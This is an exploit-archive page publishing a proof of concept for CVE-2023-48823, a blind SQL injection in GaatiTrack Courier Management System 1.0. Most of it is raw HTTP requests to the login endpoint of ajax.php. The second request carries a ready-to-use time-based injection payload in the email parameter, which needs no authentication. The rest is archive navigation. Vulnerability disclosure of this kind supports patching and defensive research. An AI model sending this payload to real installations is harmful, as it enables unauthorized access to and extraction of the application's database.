GaatiTrack Courier Management System 1.0 SQL Injection

GaatiTrack Courier Management System 1.0 SQL Injection: Posted Dec 4, 2023; Authored by Rahad Chowdhury, BugsBD Limited; GaatiTrack Courier Management System version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; advisories | CVE-2023-48823; SHA-256 | d32a123df3242fd37fdc4dbf8ce84ed24bef9916821cba9ffa99148bfc157e28; Download | Favorite | View

GaatiTrack Courier Management System 1.0 SQL Injection

# Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection
# Date: 13/11/2023
# Exploit Author: BugsBD Limited
# Discover by: Rahad Chowdhury
# Vendor Homepage: https://www.mayurik.com/
# Software Link:
https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php
# Version: v1.0
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
# CVE: CVE-2023-48823

Descriptions:
Blind SQL injection in ajax.php in GaatiTrack Courier Management
System v1.0 allows an unauthenticated attacker to insert malicious SQL
queries via email parameter.


Steps to Reproduce:

1. Request:

POST /gaatitrack/ajax.php?action=login HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: http://192.168.1.74
Connection: close
Referer: http://192.168.1.74/gaatitrack/login.php
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;
KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;
KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc

email=test%40test.com&password=123456

2. Now use blind sqli query after email parameter. So your request data will be:

POST /gaatitrack/ajax.php?action=login HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: http://192.168.1.74
Connection: close
Referer: http://192.168.1.74/gaatitrack/login.php
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;
KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;
KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc

email=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456

## Reproduce:
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)

Top Authors In Last 30 Days

Red Hat 259 files
Ubuntu 85 files
Gentoo 29 files
indoushka 26 files
Debian 11 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
S. Dietz 2 files
Google Security Research 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

GaatiTrack Courier Management System 1.0 SQL Injection

GaatiTrack Courier Management System 1.0 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

GaatiTrack Courier Management System 1.0 SQL Injection

Share This

GaatiTrack Courier Management System 1.0 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems